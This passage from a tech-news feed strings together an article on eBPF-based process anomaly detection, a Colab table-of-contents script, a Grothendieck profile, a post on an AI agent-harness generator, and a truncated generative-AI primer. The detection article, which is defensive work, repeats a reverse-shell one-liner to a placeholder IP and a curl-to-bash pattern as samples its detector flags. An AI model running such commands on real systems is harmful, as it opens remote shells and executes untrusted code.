    if let Ok(comm) = bpf_get_current_comm() {
        event.comm = comm;
    }

    emit_execve(&event)
}
```

The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required — no agents inside your containers, no sidecars, no changes to your application code.

For servers without eBPF support, the Node.js agent falls back to reading `/proc/<pid>/cmdline` and `/proc/<pid>/status` directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry.
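The polling fallback can be sketched as follows. The agent described here is written in Node.js; this Python version is only an illustration of the idea, and the function names (`parse_cmdline`, `list_pids`, `read_cmdline`, `poll_new_processes`) are hypothetical. It relies on the documented Linux behavior that `/proc/<pid>/cmdline` holds the arguments separated by NUL bytes.

```python
import os


def parse_cmdline(raw):
    """Split the NUL-separated bytes of /proc/<pid>/cmdline into arguments."""
    return [part.decode("utf-8", "replace") for part in raw.split(b"\0") if part]


def list_pids(proc_root="/proc"):
    """Numeric directory names under /proc are process IDs."""
    try:
        names = os.listdir(proc_root)
    except OSError:
        return set()  # no procfs on this system
    return {int(name) for name in names if name.isdigit()}


def read_cmdline(pid, proc_root="/proc"):
    try:
        with open(os.path.join(proc_root, str(pid), "cmdline"), "rb") as fh:
            return parse_cmdline(fh.read())
    except OSError:
        return []  # the process exited between listing and reading


def poll_new_processes(seen, proc_root="/proc"):
    """Return (current PID set, {new pid: argv}) for PIDs not in `seen`."""
    current = list_pids(proc_root)
    new = {pid: read_cmdline(pid, proc_root) for pid in sorted(current - seen)}
    return current, new
```

Calling `poll_new_processes` once per interval and feeding the returned set back in as `seen` yields only the processes that appeared since the previous poll. Short-lived processes that start and exit between two polls are missed, which is the trade-off against the kernel hook.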

Step 2: Represent each process execution as a vector

The raw event — a process name, a cmdline string, a parent process, a port — isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector.

We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector.

``` ts
function featureVector(event: ProcessEvent): number[] {
  const vec = new Float32Array(128);
  const tokens = [
    event.process_name,
    event.parent_process,
    event.event_type,
    String(event.local_port),
    String(event.remote_port),
    ...tokenise(event.cmdline), // split cmdline into meaningful tokens
  ];

  for (let i = 0; i < tokens.length; i++) {
    const t = tokens[i].toLowerCase().trim();
    if (!t) continue;
    const idx = hashStr(t, i * 31) % 128;
    const sign = (hashStr(t, i * 31 + 1) & 1) ? 1 : -1;
    vec[idx] += sign;
  }

  // L2 normalise so cosine distance is well-defined
  let norm = 0;
  for (let i = 0; i < 128; i++) norm += vec[i] * vec[i];
  norm = Math.sqrt(norm) || 1;
  return Array.from(vec).map(v => v / norm);
}
```

Feature hashing is deterministic, requires no external model, adds no latency, and works well for this kind of structured-text input. A bash -i >& /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space.

Why not use a neural embedding model?

We looked at this seriously. Models like all-MiniLM-L6-v2 (22 MB, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity — they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths.

The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 events per hour, each needing an embedding call before it can be scored and stored. The options were:

Local model on the backend — works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.

External API (e.g. OpenAI) — adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.

Feature hashing — runs in <0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.

For this specific input — structured fields like process names, parent pids, cmdline tokens — feature hashing performs surprisingly well. bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring.

The embedding layer is intentionally isolated behind a single featureVector() function. Swapping it for a neural model later is a one-function change — the scoring logic, the LanceDB tables, and the API surface don't care what's inside it.

Step 3: Store and query with LanceDB

LanceDB is an embedded vector database — it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required.

We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive and old entries are pruned after 7 days.

export async function scoreAndLearn(

org_id: string,

workload: string,

event: ProcessEvent,

): Promise<number> {

const conn = await db();

const table = await getOrCreateTable(conn, tableName(org_id, workload));

const vec = featureVector(event);

// Find k=10 nearest neighbours in this workload's history

const results = await table.vectorSearch(vec).limit(10).toArray();

let score = 1.0; // default: completely unseen

if (results.length > 0) {

const distances = results.map(r =>

cosineDistance(vec, Array.from(r.vector))

);

const minDist = Math.min(...distances);

score = Math.min(1, minDist * 2); // scale to 0–1

}

// Add this event to the baseline for future comparisons

await table.add([{ vector: vec, ts: Date.now() }]);

return score;

}

The anomaly score is close to 0 for an event that closely matches something already in the baseline, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it.
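The scoring rule inside scoreAndLearn() can be restated on its own, away from LanceDB. The sketch below is written in Python rather than the article's TypeScript and uses plain lists in place of table rows. The function names and the clamp at 0 (to absorb floating-point noise) are assumptions for illustration, not part of the original code.

```python
import math


def cosine_distance(a, b):
    """Return 1 - cosine similarity: 0 for identical directions, 2 for opposite."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0 or norm_b == 0:
        return 1.0  # assumption: treat a zero vector as unrelated
    return 1.0 - dot / (norm_a * norm_b)


def anomaly_score(vec, neighbours):
    """Scale the distance to the closest known vector into the range 0..1."""
    if not neighbours:
        return 1.0  # nothing in the baseline yet: completely unseen
    min_dist = min(cosine_distance(vec, n) for n in neighbours)
    # Same scaling as the article (distance * 2, capped at 1); the lower
    # clamp is an added assumption.
    return min(1.0, max(0.0, min_dist * 2))
```

Because only the minimum distance is used, a single close match in the baseline is enough to pull the score toward 0, which is consistent with the score dropping after a script's second run.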

Step 4: Natural language search

Once every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables.

// In the dashboard Security tab:

// "show me anything that looks like a reverse shell"

POST /telemetry/security/search

{ "query": "reverse shell bash outbound connection" }

This returns the events whose vectors are closest to the query vector — semantically similar behaviour, not keyword matches. A process running bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 will score highly even if it doesn't contain the literal words "reverse shell".

What it looks like in practice

After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts. Then:

A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn

Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run

Someone runs curl | bash as root → score 0.94, flagged immediately

Your usual nginx worker restarts → score 0.02, ignored

No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own.

The architecture in one diagram

    Server                       Backend                        Storage
    ──────                       ───────                        ───────
    eBPF (kernel) ──execve──▶    /otlp/v1/events
                                       │
    /proc fallback ──────────▶         │
                                       ▼
                                 featureVector()
                                       │
                                       ▼
                                 LanceDB (per workload) ──▶     anomaly_score
                                       │
                                       ▼
                                 ClickHouse.security_events
                                       │
                                       ▼
                                 Dashboard + NL search

What's next

The current embedding is purely structural — it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms.

We're also working on per-workload alert thresholds — so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85.

Try it on your servers

The agent installs in one command and starts building a baseline immediately. Works on any Linux server — EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else.

GR_TOKEN=your-token bash <(curl -fsSL https://gretl.dev/install-agent.sh)

---
## This tool maps cell IDs to their corresponding headings and content. Standalone TOC Generator for Google Colab  Copyright (c) 2026 1abcdefggs Licensed under the MIT License  Source: https://github.com/1abcdefggs/cell-id-call GitHub: https://github.com/1abcdefggs

> Published: 2026-05-24 03:25:11+00:00
> Source: https://gist.github.com/1abcdefggs/21632dd1f3670e8d1506e4788ab514cc
> wpnews: https://wpnews.pro/news/this-tool-maps-cell-ids-to-their-corresponding-headings-and-content-standalone-c

This article describes a standalone Python script called `standalone_toc.py` that generates a table of contents for Google Colab notebooks. The tool helps users map cell IDs to their corresponding headings and content, making it easier to understand which cell an AI assistant like Gemini is referencing. Users can customize the output by filtering by cell type, searching by keyword or cell ID, and adjusting preview settings.

standalone_toc.py


#!/usr/bin/env python3

# Copyright (c) 2026 1abcdefggs

# Licensed under the MIT License

# See LICENSE file in the project root for full license information

"""

Standalone TOC Generator for Google Colab

This script generates a table of contents for Colab notebooks without requiring external modules.

Background:

When working with AI assistants like Gemini in Colab, they often reference Cell IDs when explaining

code or content. This tool helps you map Cell IDs to their corresponding headings and content,

making it easier to understand which cell the AI is referring to.

Usage:

1. Copy this code to a new cell in your Colab notebook

2. Run the cell to generate a table of contents

3. Customize parameters in generate_standalone_toc() as needed:

   - filter_type: "All", "Code", or "Markdown"

   - keyword: Search keyword (empty string for all cells)

   - match_mode: "Cell-ID" or "Content"

   - limit: Preview character limit (default: 70)

   - show_jump: Show jump links (True/False)

   - show_stats: Show statistics (True/False)

   - save_log: Save to "TOC Preview.md" (True/False)

Source: https://github.com/1abcdefggs/cell-id-call

"""

import IPython

import json

import os

from google.colab import _message

from IPython.display import display, HTML

def _extract_heading_preview_standalone(source, cell_type, limit):

    """Extract heading preview from cell source."""

    text = "".join(source) if isinstance(source, list) else str(source)

    text = text.strip().replace("\n", " ")

    if cell_type == "markdown" and text.startswith("#"):

        cleaned = text.lstrip("#").strip()

        if not cleaned: return "(Empty heading)"

        return f"**{cleaned[:limit]}**" if len(cleaned) > limit else f"**{cleaned}**"

    return f"{text[:limit]}..." if len(text) > limit else text

def generate_standalone_toc(filter_type, keyword, match_mode, limit, show_jump, show_stats, save_log):

    """Generate standalone TOC for Colab notebook."""

    resp = _message.blocking_request('get_ipynb')

    if not resp or 'ipynb' not in resp: return

    cells = resp['ipynb'].get('cells', [])

    # Precise ID and Alignment Logic

    processed_ids = []

    for c in cells:

        meta = c.get('metadata', {})

        cid = meta.get('colab', {}).get('id') or c.get('id') or meta.get('id') or "unknown"

        processed_ids.append(str(cid))

    max_id_len = max([len(cid) for cid in processed_ids]) if processed_ids else 12

    # Dynamic Column Width Calculation

    jump_link_base = "[Jump](#scrollTo=)"

    w_jump = max(len("Jump Link"), max_id_len + len(jump_link_base))

    w_id = max(len("Cell ID"), max_id_len + 2)

    h_jump = f" {('Jump Link').ljust(w_jump)} |" if show_jump else ""

    s_jump = f" {(':---').ljust(w_jump, '-')} |" if show_jump else ""

    header = f"| Type | Index |{h_jump} {('Cell ID').ljust(w_id)} | Heading / Preview |"

    sep = f"| :--- | :--- |{s_jump} {(':---').ljust(w_id, '-')} | :--- |"

    md_table = ["# 🔍 TOC Preview. Quick Navigation (Standalone)", f"Mode: `{match_mode}`, Filter: `{filter_type}`", header, sep]

    stats = {'markdown': 0, 'code': 0, 'total': len(cells)}

    match_count = 0

    for idx, cell in enumerate(cells):

        c_type = cell.get('cell_type', 'unknown')

        stats[c_type] = stats.get(c_type, 0) + 1

        if filter_type == "Code" and c_type != 'code': continue

        if filter_type == "Markdown" and c_type != 'markdown': continue

        cell_id = processed_ids[idx]

        source_text = "".join(cell.get('source', []))

        if keyword:

            if match_mode == "Cell-ID":

                if keyword != cell_id: continue

            else:

                if keyword.lower() not in source_text.lower(): continue

        match_count += 1

        preview = _extract_heading_preview_standalone(source_text, c_type, limit)

        icon = "📝" if c_type == 'markdown' else "💻"

        row = f"| {icon} | {idx:03d} |"

        if show_jump:

            row += f" {f'[Jump](#scrollTo={cell_id})'.ljust(w_jump)} |"

        row += f" {f'`{cell_id}`'.ljust(w_id)} | {preview} |"

        md_table.append(row)

    full_md = "\n".join(md_table)

    if save_log:

        with open("TOC Preview.md", "w", encoding="utf-8") as f: f.write(full_md)

    if show_stats: print(f"📊 Total: {stats['total']} | Matches: {match_count}")

    # UI Button with improved JS for copying

    js_content = json.dumps(full_md)

    button_id = "copy_btn_standalone"

    html_btn = f'''

    <div style="margin: 15px 0;">

        <button id="{button_id}" style="background: #1a73e8; color: white; padding: 10px 20px; border: none; border-radius: 4px; cursor: pointer; font-weight: bold;">

            📋 Copy TOC to Clipboard

        </button>

    </div>

    <script>

    (function() {{

        const btn = document.getElementById("{button_id}");

        if (!btn) return;

        btn.onclick = function() {{

            const text = {js_content};

            if (!navigator.clipboard) {{

               const textArea = document.createElement("textarea");

               textArea.value = text;

               document.body.appendChild(textArea);

               textArea.select();

               try {{ document.execCommand('copy'); }} catch (err) {{ }}

               document.body.removeChild(textArea);

            }} else {{

                navigator.clipboard.writeText(text).then(() => {{

                    const original = btn.innerText;

                    btn.innerText = "✅ Copied!";

                    btn.style.background = "#34a853";

                    setTimeout(() => {{

                        btn.innerText = original;

                        btn.style.background = "#1a73e8";

                    }}, 2000);

                }});

            }}

        }};

    }})();

    </script>

    '''

    display(HTML(html_btn))

    print("\n" + full_md)

# Default configuration for standalone execution

if __name__ == "__main__":

    generate_standalone_toc(

        filter_type="All",

        keyword="",

        match_mode="Cell-ID",

        limit=70,

        show_jump=True,

        show_stats=True,

        save_log=True

    )

---
## Alexander Grothendieck Revolutionized 20th-Century Mathematics

> Published: 2026-05-24 03:19:02+00:00
> Source: https://www.quantamagazine.org/how-alexander-grothendieck-revolutionized-20th-century-mathematics-20260520/
> wpnews: https://wpnews.pro/news/alexander-grothendieck-revolutionized-20th-century-mathematics

Alexander Grothendieck revolutionized 20th-century mathematics by reorienting the field toward abstract relationships between objects rather than the objects themselves, most notably in algebraic geometry. His work, which included a landmark generalization of the Riemann-Roch theorem in 1957, introduced new terminology and constructions that transformed multiple areas of math, including number theory and topology. After producing thousands of pages of influential notes from the 1950s onward, he abruptly left his prestigious research post in 1970 and lived as a hermit in the Pyrenees until his death.

How Alexander Grothendieck Revolutionized 20th-Century Mathematics
Introduction
What Albert Einstein was to 20th-century physics, Alexander Grothendieck was to 20th-century mathematics. He is much less well known because math gets technical even more quickly than physics does. But as with Einstein, Grothendieck’s impact came not just from his own results, revolutionary though they were. His work also reoriented his entire discipline in radical new directions.
Grothendieck was intense and ascetic from his early days. Starting in the early 1950s, when he was in his 20s, he produced thousands of pages of formal and informal notes that changed the course of mathematics. Then in 1970, he quit. He left his post at a prestigious research institute just outside of Paris to teach at the provincial university in Montpellier where he studied as an undergraduate. He mostly stopped talking to other mathematicians. In the early 1990s, he moved to a small village in the Pyrenees, where he lived as a hermit.
Mathematicians are still grappling with the innovations he made half a century ago. His work pushed mathematics to a new level of abstraction by focusing on the relationships between objects rather than the objects themselves. “If there is one thing in mathematics which fascinates me more than any other (and undoubtedly always has), it is neither ‘number’ nor ‘size,’ but invariably shape,” he wrote in his memoirs. “And among the thousand and one faces under which shape chooses to reveal itself to us, that which has fascinated me more than any other and continues to do so is the structure hidden in mathematical things.”
His revolutionary mathematics centered around that search for hidden structure.
Revealing Shapes
Grothendieck is most famous for his work in algebraic geometry. The field first developed as the study of shapes defined by polynomial equations: equations that add together variables raised to fixed powers. These can be as simple as a line (x – y = 0) or a circle (x² + y² – 1 = 0). But as you consider more and more variables raised to higher powers and also look for solutions that satisfy sets of many equations instead of just one, things quickly get more complicated, and more abstract.
The discipline took flight in the late 19th century, when mathematicians started asking questions about what happens if instead of plugging ordinary numbers into your equations, you plug in numbers from other, more abstract sets.
Before Grothendieck, algebraic geometry was an interesting and vibrant subdiscipline within mathematics. But it was also somewhat in crisis, as the mathematician David Mumford later wrote. “Every researcher used his own definitions and terminology, in which the ‘foundations’ of the subject had been described in at least half a dozen different mathematical ‘languages.’”
Then “Grothendieck came along and turned a confused world of researchers upside down, overwhelming them with [a] new terminology … as well as with a huge production of new and very exciting results.”
Grothendieck is most famous for introducing mathematical constructions that helped him and others prove longstanding conjectures, and that eventually became central objects of study in their own right.
His work also put algebraic geometry in the center of a web of many other areas of math — among them topology, number theory, representation theory, and logic. “Grothendieck never worked directly in number theory,” said Brian Conrad of Stanford University, “but the ideas he introduced into algebraic geometry totally transformed how number theory is done.”
His first major result in algebraic geometry was his 1957 generalization of the Riemann-Roch theorem, a proof from a century earlier that dictates how the shape of a surface limits which functions can be defined on it. As Leila Schneps of the French National Center for Scientific Research wrote, Grothendieck’s proof “propelled him to instant stardom in the world of mathematics.”
Thanks to his techniques, “a whole new wealth of operations becomes available,” Conrad said. “It opens up a whole new way to think about why the theorem is true.”
Then, just as quickly, Grothendieck moved on to the next thing. At the 1958 International Congress of Mathematicians, he announced his intention to remake all of algebraic geometry. He was going to do it with something called a scheme.
A New Scheme of Mathematics
A decade earlier, the mathematician André Weil had conjectured a link between solutions to polynomial equations defined in two very different mathematical settings. The first was finite fields, number systems that operate according to a cyclical form of arithmetic. The second was complex numbers, which take our familiar, everyday numbers and add the square root of -1, called i.
Weil made four conjectures that related polynomials from one setting to those from the other. These conjectures, Conrad said, “sound like communication between parallel universes.”
As part of the effort to prove these conjectures, Grothendieck proposed his notion of a scheme. The attempted proofs were “a primary motivation for the theory of schemes,” said Daniel Litt of the University of Toronto, but “what it really bought you was a whole lot more.”
Before Weil, mathematicians only really talked about equations like x² + y² – 1 = 0 by specifying the particular number system they wanted to work in. The solutions to such equations would look quite different if x and y could only be integers, for example, versus if they could be any real number, or any complex number.
After Grothendieck came up with an explanation for why Weil’s conjectures are true, mathematicians came to believe that equations had meaningful structure independent of whether x and y were complex numbers, or elements of a finite field, or bananas. At first, this belief seems to make as little sense as saying that a sentence has meaning regardless of which language you choose its words from. But Grothendieck defined mathematical structures that made it possible to make such statements rigorous and even intuitive to those who mastered his new language.
As Conrad explained, “Grothendieck found the right way to define abstract notions of space, new ways of thinking about spaces.” He recognized that “the way you probe the geometry of a space is not by looking at the points, but by studying other things.”
That’s where Grothendieck’s schemes came into play. It takes some effort to construct even a simple scheme. But if you read on, it’s possible to understand what schemes are and develop an intuition for why they’re useful.
Schemes are geometric spaces that are built out of abstract algebraic ingredients.
Start with an abstract generalization of the integers called a ring. A ring is a set of elements that can be added, subtracted, and multiplied together, but that can’t always be divided. (In the ring of integers, for instance, you can’t divide 2 by 3, because 2/3 isn’t an integer.)
Now look at a subset of your ring that is “closed,” meaning that if you add or subtract two elements of the subset, the result is also in the subset. For example, take all multiples of 5. This subset is not only closed, it has another property: You can multiply any number in the ring by an element in the subset, and the result is inevitably also in the subset. That makes the subset what mathematicians call an ideal.
Moreover, if you multiply any two numbers from the ring and end up in this subset (3 × 5 = 15), then one of the numbers you multiplied (5) must have been in this subset, too, even though the other number (3) isn’t.
This second property makes the subset a prime ideal. (To see why, look at the multiples of 6. These form an ideal, but not a prime ideal, because 2 × 3 is in the ideal, but neither 2 nor 3 is.)
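The contrast between the multiples of 5 and the multiples of 6 can be checked by brute force. The Python sketch below is only an illustration: the function names and the search bound are assumptions, and finding no counterexample in a finite range is evidence, not a proof (for a prime such as 5, the property holds in general by Euclid's lemma).

```python
from itertools import product


def in_ideal(x, n):
    """True if x lies in the ideal of all multiples of n."""
    return x % n == 0


def prime_ideal_counterexample(n, bound=50):
    """Search for (a, b) with a*b in the ideal but neither a nor b in it.

    Returns the first such pair found, or None if there is none below bound.
    """
    for a, b in product(range(1, bound), repeat=2):
        if in_ideal(a * b, n) and not in_ideal(a, n) and not in_ideal(b, n):
            return (a, b)
    return None


print(prime_ideal_counterexample(5))  # None: no violation found for multiples of 5
print(prime_ideal_counterexample(6))  # (2, 3): 6 is in the ideal, 2 and 3 are not
```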
In the case of the integers, the prime ideals are sets of multiples corresponding to each of the prime numbers, along with zero. It’s possible to study the set of all the prime ideals of a ring as a single geometric space. First, represent each prime ideal as a point. Then define a “topology” on those points that puts them into neighborhoods, depending on their shared elements. (Strangely, the zero ideal ends up being “close” to every single prime, illustrating a previously unknown structure hidden behind the integers.)
Grothendieck’s innovation was to add a layer on top of this space — a recently discovered mathematical superstructure called a sheaf, which carries additional algebraic information.
At each point in your space, for instance, this sheaf attaches another set, called a stalk. Let’s return to one of the prime ideals of the integers: the point in our space representing the subset of all multiples of 5. The stalk attached to this point would contain all the fractions whose denominators are not divisible by 5. (The stalk attached to 0 contains all possible fractions.) In this simple example, it’s hard to see what the stalks accomplish, but in more elaborate schemes, computing the contents of stalks and the ways they interact with each other turned out to be a mathematically powerful machine.
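To make the stalk at the point for multiples of 5 a little more concrete, the Python sketch below tests membership using exact fractions. The helper name in_stalk is hypothetical, and "denominator" is taken to mean the denominator after reducing to lowest terms, which is what the standard-library Fraction type stores.

```python
from fractions import Fraction


def in_stalk(q, p=5):
    """True if the reduced denominator of q is not divisible by p."""
    return Fraction(q).denominator % p != 0


a = Fraction(1, 2)
b = Fraction(2, 3)

print(in_stalk(a), in_stalk(b))      # both denominators avoid 5
print(in_stalk(a + b))               # 7/6: sums stay inside
print(in_stalk(a * b))               # 1/3: products stay inside
print(in_stalk(Fraction(1, 5)))      # False: dividing by 5 is not allowed
```

Sums and products of members stay inside the set, so the stalk is itself a ring, one in which every integer except the multiples of 5 can be divided by.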
This entire object — the space of prime ideals, with the sheaf (and all its stalks) built on top of it — is called an affine scheme. In general, schemes are constructed by gluing affine schemes together in a precise mathematical way.
So what does all that have to do with an equation like x2 + y2 – 1 = 0? Well, instead of starting with the ring of integers, you can study a particular ring associated with that polynomial. You can then build the scheme for that ring.
But crucially, the variables x and y can be whatever you want them to be: integers, real numbers, complex numbers, elements of a finite field. By studying the scheme’s properties, you can gain insight about the structure of the equation, independent of any particular number system. It is, impossible though it may sound, a way to study the sentence apart from the language its words are written in.
Broadly speaking, this is why Grothendieck and others could use schemes — and a series of ideas building on them — to re-prove one of the four Weil conjectures and prove two more. (Grothendieck’s student Pierre Deligne would later use other structures that Grothendieck developed to prove the fourth, which is a version of the famous Riemann hypothesis in the setting of finite fields.) Grothendieck continued to come up with even more abstract and powerful concepts, including topoi, stacks, motives, and étale cohomology. All play a major role in algebraic geometry and other areas of math today.
Schemes gave mathematicians a novel, systematic way to study the relationships between objects in algebraic geometry. And because schemes allow you to study rings, which appear all over math, as geometric spaces, they can be used to import geometric techniques into algebra, number theory, and beyond.
Grothendieck died in 2014 after years of solitude, estranged from the mathematical community he had helped create. Nonetheless, mathematicians remember him with reverent affection. As the Harvard mathematician Barry Mazur wrote, “During the early ’60s, his conversations had a secure calmness. He would offer mathematical ideas with a smile that always had an expanse of generosity in it … a sense that ‘nothing could be easier in the world’ than to view things as he did.”
His ideas were complicated, but “most of the arguments are very straightforward once you set things up,” Litt said. “You just keep going and going and going. He found us the highway.”

---
## 2026 Q1 is the year developers still build the agent harness. 2026 Q3 / 2027 is the year the LLM builds its own harness.

> Published: 2026-05-24 03:12:16+00:00
> Source: https://dev.to/programming_withjackche/2026-q1-is-the-year-developers-still-build-the-agent-harness-2026-q3-2027-is-the-year-the-llm-359f
> wpnews: https://wpnews.pro/news/2026-q1-is-the-year-developers-still-build-the-agent-harness-2026-q3-2027-is-the

According to the article, the "agent harness" refers to the essential context files (such as AGENTS.md, CLAUDE.md, and rule sets) that AI coding agents require before they can work effectively on a project. The author predicts that while developers will still need to manually create this harness in early 2026, by late 2026 or 2027, large language models will be capable of automatically generating their own project-specific harness. To bridge this gap, the author created "harnessforge," an open-source tool that locally inspects a repository and generates the necessary startup files for various AI coding agents.

2026 Q1 is the year developers still build the agent harness.
2026 Q3 / 2027 is the year the LLM builds its own harness.
Today, every AI coding agent — Claude Code, Cursor, Codex, Gemini CLI, Aider, you name it — depends on the same hidden layer:
the files that brief the agent before it starts work.
AGENTS.md
CLAUDE.md
.cursor/rules
SKILLS/
MCP server lists
memory schemas
test commands
lint commands
“Do not touch these paths.”
“Require human approval before this.”
Different IDE, same boilerplate.
Different repo, same boilerplate.
Different agent, same boilerplate.
That is the agent harness problem.
Most people talk about the coding agent itself.
But in practice, the quality of an AI coding session often depends on the context layer around the agent.
Before the agent starts coding, it needs to know:
Without this layer, even strong coding agents can make subtle mistakes.
With this layer, the same agent can behave much more consistently.
That layer is what I call the harness.
In theory, the LLM should be able to inspect a repo and generate all of this itself.
In practice, we are not fully there yet.
The models are smart enough to do real coding work, but not always reliable enough to deterministically generate perfect project-specific ground truth from scratch on every fresh repo, every time.
They can do it sometimes.
Not always.
So the human stays in the loop.
We write the same repo instructions again.
We copy the same rules across projects.
We maintain separate files for Claude Code, Cursor, Codex-style agents, Continue, Windsurf, and others.
Small work per repo.
Painful in aggregate.
I think this is temporary.
Soon, the coding model should be able to:
At that point, the harness layer disappears as a separately authored artifact.
But until then, developers still need a bridge.
I built harnessforge to test this idea.
It is a local, open-source harness generator for AI coding agents.
It is not another coding agent.
Your coding agent stays the brain.
harnessforge just lays down the ground truth the agent reads before work begins.
Run:
uvx harnessforge init
or install:
pip install harnessforge
In a few seconds, fully local with no network calls by default, it inspects your repo and generates startup files commonly used by AI coding agents.
Depending on the project and blueprint, harnessforge can generate files such as:
AGENTS.md
SOUL.md
TOOLS.md
MEMORY.md
SKILLS/
.claude/CLAUDE.md
.cursor/rules
.continue/
.windsurf/rules
blueprint-specific validators
The goal is simple:
give the coding agent a stronger starting point.
The current version includes these blueprints:
rag-agent
For retrieval systems, knowledge-base agents, citation enforcement, and grounded responses.
finance-agent
For finance or stock-related agents, including market-data handling and validation rules around trade execution safety.
support-agent
For customer support flows such as intent detection, knowledge-base lookup, ticket creation, escalation, and ticket lineage.
workflow-agent
For multi-step orchestration with tool logs, idempotency, and validation structure.
python-cli-app
A default blueprint for greenfield Python CLI projects.
The important idea is not the specific files.
The important idea is that coding agents need a reliable project-specific operating context.
Today, we manually maintain that context.
Tomorrow, the model may generate it automatically.
harnessforge is meant to sit in the middle.
A bridge, not a moat.
Use it now.
Throw it away when the models catch up.
uvx harnessforge init
Then open Claude Code, Cursor, Codex, Gemini CLI, Aider, or another coding agent inside the repo.
The agent now has project-specific context files to read before it starts work.
Instead of starting from a blank repo, the agent starts with:
The coding agent still writes the code.
The harness just gives it the right context.
My bet is:
2026 Q1: developers still build the agent harness.
2026 Q3 / 2027: the LLM builds its own harness.
Until that happens, a local deterministic harness generator can make AI coding workflows more reliable.
GitHub:
https://github.com/jcaiagent7143-ui/harnessforge
PyPI:
https://pypi.org/project/harnessforge/
I would love feedback from developers using Claude Code, Cursor, Codex, Gemini CLI, Aider, Continue, Windsurf, or other coding agents in real repos.
How are you managing your agent harness today?
Are you manually maintaining AGENTS.md, CLAUDE.md, .cursor/rules, MCP configs, memory files, and validation rules?
Or do you think the next generation of coding models will generate this layer automatically?

---
## Introduction to Generative AI

> Published: 2026-05-24 03:11:43+00:00
> Source: https://dev.to/indumathi__r/introduction-to-generative-ai-6in
> wpnews: https://wpnews.pro/news/introduction-to-generative-ai

Generative AI creates content like text, images, or video based on user input using a mathematical model trained on vast amounts of multimodal data. A common type is the large language model (LLM), which predicts the next word by assigning probability scores to possible outputs and selecting the highest-scoring one. Output generation can be controlled by adjusting parameters like temperature (factual vs. imaginative), Top-K (number of token candidates), and Top-P (cumulative probability threshold).

What is Generative AI?
Generative AI produces output such as text, images, or video in response to a user's input (the user query).
How does it generate content?
The output is generated by a model: the model receives the input and produces an output based on it.
What is a model?
At its core, a model is a mathematical function with a very large number of dimensions. To arrive at that function, the model is trained on a vast amount of multimodal data (text, audio, video, images, and so on), and backpropagation is used to adjust it toward the desired state.
A 120B model is one whose function has 120 billion parameters. One of the most commonly used model types in generative AI is the LLM.
What is LLM ?
LLM stand for large language model. LLM basically predict the next word. If i provide the input query as hello to gpt model, based on the data it was trained, it will predict and returns the next word. In my case i got Hello,How can I help you today?
Response will not be generated and sent all at once. It will be generated one by one and sent in a streamed manner(by means of SSE event).
How it predicts the next word?
In the above example, when i gave hello as input, why "Hi, how can i help you today was returned" ? not hi or world etc .
For the given input, model provides some of possibility words like
hi, world, howdy, how may i help you etc. For each possible word, it gives a score(most occuring probability). Word which is having highest score will be returned as output. If the scores are hi (0.2), world(0.4), howdy(0.1), how may i help you(0.7), highest score is 0.7, so "how may i help you is returned".
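The selection rule described above (pick the candidate with the highest score) can be sketched in a few lines. This is only an illustration: the function name `pickHighest` is made up for this example, the scores are the illustrative ones from the text, and real models score individual tokens over a much larger vocabulary.

```typescript
// Illustrative scores copied from the example in the text (not real model output).
const candidateScores: Record<string, number> = {
  "hi": 0.2,
  "world": 0.4,
  "howdy": 0.1,
  "how may i help you": 0.7,
};

// Hypothetical helper: return the candidate with the highest score.
function pickHighest(scores: Record<string, number>): string {
  let best = "";
  let bestScore = -Infinity;
  for (const candidate of Object.keys(scores)) {
    if (scores[candidate] > bestScore) {
      best = candidate;
      bestScore = scores[candidate];
    }
  }
  return best;
}

console.log(pickHighest(candidateScores));
```

Always taking the top candidate is often called greedy decoding; the parameters discussed next change how the final choice is made.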
Can we tweak the model to control the output?
Yes, by adjusting the following parameters:
1. Temperature
2. Top-K
3. Top-P
1. Temperature
Temperature controls whether the generated output is more factual or more imaginative. In this article the value ranges from 0 to 1 (some APIs accept larger values). The closer it is to 0, the more factual and predictable the output; the closer it is to 1, the more imaginative.
Example prompt for low temperature
Example prompt for high temperature
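One common way temperature is applied is to divide the model's raw scores (logits) by the temperature before turning them into probabilities with a softmax. The sketch below assumes that formulation; the function name and the sample logits are invented for illustration and are not taken from any particular model or API.

```typescript
// Hypothetical helper: softmax over logits scaled by a temperature.
// Lower temperature sharpens the distribution; higher temperature flattens it.
function softmaxWithTemperature(logits: number[], temperature: number): number[] {
  if (temperature <= 0) {
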